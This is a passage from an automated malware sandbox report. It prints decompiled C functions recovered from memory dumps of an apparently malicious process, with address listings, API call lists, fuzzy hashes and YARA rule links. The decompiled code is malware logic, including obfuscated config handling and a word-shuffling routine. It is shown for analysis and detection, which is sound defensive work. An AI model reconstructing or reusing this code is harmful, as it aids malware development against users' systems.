						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}




















                                                                                                                                                                                                                                0x02bb2032
                                                                                                                                                                                                                                0x02bb2035
                                                                                                                                                                                                                                0x02bb203e
                                                                                                                                                                                                                                0x02bb2041
                                                                                                                                                                                                                                0x02bb2044
                                                                                                                                                                                                                                0x02bb204c
                                                                                                                                                                                                                                0x02bb214a
                                                                                                                                                                                                                                0x02bb2150
                                                                                                                                                                                                                                0x02bb2158
                                                                                                                                                                                                                                0x02bb2160
                                                                                                                                                                                                                                0x02bb2167
                                                                                                                                                                                                                                0x02bb2167
                                                                                                                                                                                                                                0x02bb215a
                                                                                                                                                                                                                                0x02bb215d
                                                                                                                                                                                                                                0x02bb215d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb215d
                                                                                                                                                                                                                                0x02bb2055
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2062
                                                                                                                                                                                                                                0x02bb206a
                                                                                                                                                                                                                                0x02bb2141
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2141
                                                                                                                                                                                                                                0x02bb2076
                                                                                                                                                                                                                                0x02bb207b
                                                                                                                                                                                                                                0x02bb2080
                                                                                                                                                                                                                                0x02bb212f
                                                                                                                                                                                                                                0x02bb2136
                                                                                                                                                                                                                                0x02bb2136
                                                                                                                                                                                                                                0x02bb213c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2086
                                                                                                                                                                                                                                0x02bb2086
                                                                                                                                                                                                                                0x02bb2086
                                                                                                                                                                                                                                0x02bb2086
                                                                                                                                                                                                                                0x02bb208b
                                                                                                                                                                                                                                0x02bb208d
                                                                                                                                                                                                                                0x02bb208d
                                                                                                                                                                                                                                0x02bb209a
                                                                                                                                                                                                                                0x02bb20a2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb20a4
                                                                                                                                                                                                                                0x02bb20b1
                                                                                                                                                                                                                                0x02bb20b7
                                                                                                                                                                                                                                0x02bb20b7
                                                                                                                                                                                                                                0x02bb20ba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb20c7
                                                                                                                                                                                                                                0x02bb20db
                                                                                                                                                                                                                                0x02bb2111
                                                                                                                                                                                                                                0x02bb2114
                                                                                                                                                                                                                                0x02bb2117
                                                                                                                                                                                                                                0x02bb211f
                                                                                                                                                                                                                                0x02bb2125
                                                                                                                                                                                                                                0x02bb212a
                                                                                                                                                                                                                                0x02bb212a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb211f
                                                                                                                                                                                                                                0x02bb20dd
                                                                                                                                                                                                                                0x02bb20e4
                                                                                                                                                                                                                                0x02bb20ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb20ee
                                                                                                                                                                                                                                0x02bb20f4
                                                                                                                                                                                                                                0x02bb20fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2103
                                                                                                                                                                                                                                0x02bb2103
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2103
                                                                                                                                                                                                                                0x02bb20fc
                                                                                                                                                                                                                                0x02bb20c4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2106
                                                                                                                                                                                                                                0x02bb2106
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB214A
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB20BE
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000), ref: 02BB20CE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB20EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 35602742-1701360479
                                                                                                                                                                                                                                • Opcode ID: 5765ed8dbac8939d09885b204f76c999746e265bf23d1d2d35169993636dc229
                                                                                                                                                                                                                                • Instruction ID: 30affee0652f827c292cef16414207f483c29ccbc55974206608face33d15476
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5765ed8dbac8939d09885b204f76c999746e265bf23d1d2d35169993636dc229
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141A875D00209EFDF12DFA4C984AFEBBB9FF04345B5044AAE902E7250D7B09A84DB61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB45CF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                			E02BB45CF(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2bbd364; // 0x52f95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2bbd364; // 0x52f95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2bbd030) {
					HeapFree( *0x2bbd270, 0, _t8);
				}
				_t9 = E02BB5341(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2bbd364; // 0x52f95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                                                                                                                                0x02bb45cf
                                                                                                                                                                                                                                0x02bb45cf
                                                                                                                                                                                                                                0x02bb45d8
                                                                                                                                                                                                                                0x02bb45e8
                                                                                                                                                                                                                                0x02bb45e8
                                                                                                                                                                                                                                0x02bb45ed
                                                                                                                                                                                                                                0x02bb45f2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb45e2
                                                                                                                                                                                                                                0x02bb45e2
                                                                                                                                                                                                                                0x02bb45f4
                                                                                                                                                                                                                                0x02bb45f8
                                                                                                                                                                                                                                0x02bb460a
                                                                                                                                                                                                                                0x02bb460a
                                                                                                                                                                                                                                0x02bb4615
                                                                                                                                                                                                                                0x02bb461a
                                                                                                                                                                                                                                0x02bb461d
                                                                                                                                                                                                                                0x02bb4622
                                                                                                                                                                                                                                0x02bb4626
                                                                                                                                                                                                                                0x02bb462c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BB45D8
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,02BB5884), ref: 02BB45E2
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,02BB5884), ref: 02BB460A
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BB4626
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: e131def47b44d62876c752a88080aeb0bb749ae656239c00c8a4b2f54aee7fd7
                                                                                                                                                                                                                                • Instruction ID: 7fa5a9be8eed14682a8fe762831bf9b35bd44cf0b8d8b160b04eb8405d97d5ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e131def47b44d62876c752a88080aeb0bb749ae656239c00c8a4b2f54aee7fd7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84F03A70E842429FDB278F64EA49B663BB4FF00380B008855F502C7252C3A4E820CB29
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB5701, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E02BB5701(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02BB2CC9();
				if(_t21 != 0) {
					_t59 =  *0x2bbd294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2bbd294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2bbd12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02BB2A45( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2bbd2e0; // 0x273a5a8
					if( *0x2bbd294 > 5) {
						_t8 = _t26 + 0x2bbe5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2bbe9f9; // 0x44283a44
						_t27 = _t7;
					}
					E02BB276B(_t27, _t27);
					_t31 = E02BB1DF5(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2bbd2a8 =  *0x2bbd2a8 ^ 0x81bbe65d;
						_t32 = E02BB5157(0x60);
						 *0x2bbd364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2bbd364; // 0x52f95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2bbd364; // 0x52f95b0
							 *_t51 = 0x2bbe823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2bbd270, 0, 0x43);
							 *0x2bbd300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2bbd294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2bbd2e0; // 0x273a5a8
								_t13 = _t58 + 0x2bbe55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2bbc2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02BB9DE1( ~_v8 &  *0x2bbd2a8, 0x2bbd00c); // executed
								_t42 = E02BB235B(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02BB6EDD(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02BB9FF2(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E02BBA23E(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2bbd128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02BB6ABB(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                                                                                                                                0x02bb5701
                                                                                                                                                                                                                                0x02bb570c
                                                                                                                                                                                                                                0x02bb570f
                                                                                                                                                                                                                                0x02bb5712
                                                                                                                                                                                                                                0x02bb5715
                                                                                                                                                                                                                                0x02bb571c
                                                                                                                                                                                                                                0x02bb571e
                                                                                                                                                                                                                                0x02bb572a
                                                                                                                                                                                                                                0x02bb572c
                                                                                                                                                                                                                                0x02bb572c
                                                                                                                                                                                                                                0x02bb5735
                                                                                                                                                                                                                                0x02bb573b
                                                                                                                                                                                                                                0x02bb5740
                                                                                                                                                                                                                                0x02bb575a
                                                                                                                                                                                                                                0x02bb5766
                                                                                                                                                                                                                                0x02bb5768
                                                                                                                                                                                                                                0x02bb576d
                                                                                                                                                                                                                                0x02bb5777
                                                                                                                                                                                                                                0x02bb5777
                                                                                                                                                                                                                                0x02bb576f
                                                                                                                                                                                                                                0x02bb576f
                                                                                                                                                                                                                                0x02bb576f
                                                                                                                                                                                                                                0x02bb576f
                                                                                                                                                                                                                                0x02bb577e
                                                                                                                                                                                                                                0x02bb578b
                                                                                                                                                                                                                                0x02bb5792
                                                                                                                                                                                                                                0x02bb5797
                                                                                                                                                                                                                                0x02bb5797
                                                                                                                                                                                                                                0x02bb579f
                                                                                                                                                                                                                                0x02bb57a2
                                                                                                                                                                                                                                0x02bb57c8
                                                                                                                                                                                                                                0x02bb57d4
                                                                                                                                                                                                                                0x02bb57d9
                                                                                                                                                                                                                                0x02bb57de
                                                                                                                                                                                                                                0x02bb57e0
                                                                                                                                                                                                                                0x02bb580c
                                                                                                                                                                                                                                0x02bb580e
                                                                                                                                                                                                                                0x02bb57e2
                                                                                                                                                                                                                                0x02bb57e6
                                                                                                                                                                                                                                0x02bb57eb
                                                                                                                                                                                                                                0x02bb57f0
                                                                                                                                                                                                                                0x02bb57f7
                                                                                                                                                                                                                                0x02bb57fd
                                                                                                                                                                                                                                0x02bb5802
                                                                                                                                                                                                                                0x02bb5808
                                                                                                                                                                                                                                0x02bb580f
                                                                                                                                                                                                                                0x02bb5811
                                                                                                                                                                                                                                0x02bb5813
                                                                                                                                                                                                                                0x02bb5822
                                                                                                                                                                                                                                0x02bb5828
                                                                                                                                                                                                                                0x02bb582d
                                                                                                                                                                                                                                0x02bb582f
                                                                                                                                                                                                                                0x02bb585f
                                                                                                                                                                                                                                0x02bb5861
                                                                                                                                                                                                                                0x02bb5831
                                                                                                                                                                                                                                0x02bb5831
                                                                                                                                                                                                                                0x02bb5837
                                                                                                                                                                                                                                0x02bb5844
                                                                                                                                                                                                                                0x02bb584a
                                                                                                                                                                                                                                0x02bb584a
                                                                                                                                                                                                                                0x02bb5852
                                                                                                                                                                                                                                0x02bb585b
                                                                                                                                                                                                                                0x02bb5862
                                                                                                                                                                                                                                0x02bb5864
                                                                                                                                                                                                                                0x02bb5866
                                                                                                                                                                                                                                0x02bb586d
                                                                                                                                                                                                                                0x02bb587a
                                                                                                                                                                                                                                0x02bb587f
                                                                                                                                                                                                                                0x02bb5884
                                                                                                                                                                                                                                0x02bb5886
                                                                                                                                                                                                                                0x02bb5888
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb588a
                                                                                                                                                                                                                                0x02bb588f
                                                                                                                                                                                                                                0x02bb5891
                                                                                                                                                                                                                                0x02bb5898
                                                                                                                                                                                                                                0x02bb589c
                                                                                                                                                                                                                                0x02bb589f
                                                                                                                                                                                                                                0x02bb58b4
                                                                                                                                                                                                                                0x02bb58b8
                                                                                                                                                                                                                                0x02bb58bd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58bd
                                                                                                                                                                                                                                0x02bb58a1
                                                                                                                                                                                                                                0x02bb58a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58ae
                                                                                                                                                                                                                                0x02bb58b0
                                                                                                                                                                                                                                0x02bb58b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58b2
                                                                                                                                                                                                                                0x02bb5895
                                                                                                                                                                                                                                0x02bb5895
                                                                                                                                                                                                                                0x02bb5866
                                                                                                                                                                                                                                0x02bb57a4
                                                                                                                                                                                                                                0x02bb57a4
                                                                                                                                                                                                                                0x02bb57a9
                                                                                                                                                                                                                                0x02bb58bf
                                                                                                                                                                                                                                0x02bb58c3
                                                                                                                                                                                                                                0x02bb58cb
                                                                                                                                                                                                                                0x02bb58cb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58c3
                                                                                                                                                                                                                                0x02bb57af
                                                                                                                                                                                                                                0x02bb57b2
                                                                                                                                                                                                                                0x02bb57bc
                                                                                                                                                                                                                                0x02bb57c3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58d3
                                                                                                                                                                                                                                0x02bb58d3
                                                                                                                                                                                                                                0x02bb58d7
                                                                                                                                                                                                                                0x02bb58db
                                                                                                                                                                                                                                0x02bb58db

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB2CC9: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BB571A,00000000,00000000), ref: 02BB2CD8
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BB5797
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB57E6
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(052F9570), ref: 02BB57F7
                                                                                                                                                                                                                                  • Part of subcall function 02BBA23E: memset.NTDLL ref: 02BBA253
                                                                                                                                                                                                                                  • Part of subcall function 02BBA23E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BBA295
                                                                                                                                                                                                                                  • Part of subcall function 02BBA23E: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02BBA2A0
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BB5822
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB5852
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4246211962-0
                                                                                                                                                                                                                                • Opcode ID: 9bec615a42e083485f41d23ca328a6b82dfb7aff55d6f21041ce8640c93863c7
                                                                                                                                                                                                                                • Instruction ID: 1eca39d44faa20a0d58afe9a39d14a67cd24736d21de04a9ddfe544a3e67800c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bec615a42e083485f41d23ca328a6b82dfb7aff55d6f21041ce8640c93863c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F051CF71E41216ABEF33ABA0DC84BFE77A8EF04740F8448A6E546D7140E7F4E5408B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB5CFD, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 22%
                                                                                                                                                                                                                                			E02BB5CFD(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02BB5157(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02BB53BB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02BB5157((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2bbd2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                                                                                                                                0x02bb5d04
                                                                                                                                                                                                                                0x02bb5d0b
                                                                                                                                                                                                                                0x02bb5d10
                                                                                                                                                                                                                                0x02bb5d13
                                                                                                                                                                                                                                0x02bb5d1a
                                                                                                                                                                                                                                0x02bb5d1d
                                                                                                                                                                                                                                0x02bb5d20
                                                                                                                                                                                                                                0x02bb5d25
                                                                                                                                                                                                                                0x02bb5d2a
                                                                                                                                                                                                                                0x02bb5e7e
                                                                                                                                                                                                                                0x02bb5e80
                                                                                                                                                                                                                                0x02bb5e82
                                                                                                                                                                                                                                0x02bb5e87
                                                                                                                                                                                                                                0x02bb5e87
                                                                                                                                                                                                                                0x02bb5d30
                                                                                                                                                                                                                                0x02bb5d33
                                                                                                                                                                                                                                0x02bb5d36
                                                                                                                                                                                                                                0x02bb5d38
                                                                                                                                                                                                                                0x02bb5d38
                                                                                                                                                                                                                                0x02bb5d3c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5d40
                                                                                                                                                                                                                                0x02bb5d6c
                                                                                                                                                                                                                                0x02bb5d71
                                                                                                                                                                                                                                0x02bb5d73
                                                                                                                                                                                                                                0x02bb5d73
                                                                                                                                                                                                                                0x02bb5d76
                                                                                                                                                                                                                                0x02bb5d79
                                                                                                                                                                                                                                0x02bb5d79
                                                                                                                                                                                                                                0x02bb5d7b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5d46
                                                                                                                                                                                                                                0x02bb5d48
                                                                                                                                                                                                                                0x02bb5d67
                                                                                                                                                                                                                                0x02bb5d67
                                                                                                                                                                                                                                0x02bb5d7e
                                                                                                                                                                                                                                0x02bb5d7e
                                                                                                                                                                                                                                0x02bb5d7f
                                                                                                                                                                                                                                0x02bb5d7f
                                                                                                                                                                                                                                0x02bb5d82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5d82
                                                                                                                                                                                                                                0x02bb5d4c
                                                                                                                                                                                                                                0x02bb5d93
                                                                                                                                                                                                                                0x02bb5d97
                                                                                                                                                                                                                                0x02bb5e71
                                                                                                                                                                                                                                0x02bb5e73
                                                                                                                                                                                                                                0x02bb5e73
                                                                                                                                                                                                                                0x02bb5e74
                                                                                                                                                                                                                                0x02bb5e77
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5e77
                                                                                                                                                                                                                                0x02bb5da0
                                                                                                                                                                                                                                0x02bb5db1
                                                                                                                                                                                                                                0x02bb5db5
                                                                                                                                                                                                                                0x02bb5e6d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5e6d
                                                                                                                                                                                                                                0x02bb5dbb
                                                                                                                                                                                                                                0x02bb5dbe
                                                                                                                                                                                                                                0x02bb5dc2
                                                                                                                                                                                                                                0x02bb5dc6
                                                                                                                                                                                                                                0x02bb5dcb
                                                                                                                                                                                                                                0x02bb5e63
                                                                                                                                                                                                                                0x02bb5e63
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5e69
                                                                                                                                                                                                                                0x02bb5dd6
                                                                                                                                                                                                                                0x02bb5ddf
                                                                                                                                                                                                                                0x02bb5df3
                                                                                                                                                                                                                                0x02bb5dfa
                                                                                                                                                                                                                                0x02bb5e0f
                                                                                                                                                                                                                                0x02bb5e15
                                                                                                                                                                                                                                0x02bb5e1d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5e1f
                                                                                                                                                                                                                                0x02bb5e1f
                                                                                                                                                                                                                                0x02bb5e1f
                                                                                                                                                                                                                                0x02bb5e26
                                                                                                                                                                                                                                0x02bb5e2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5e30
                                                                                                                                                                                                                                0x02bb5e39
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5e3b
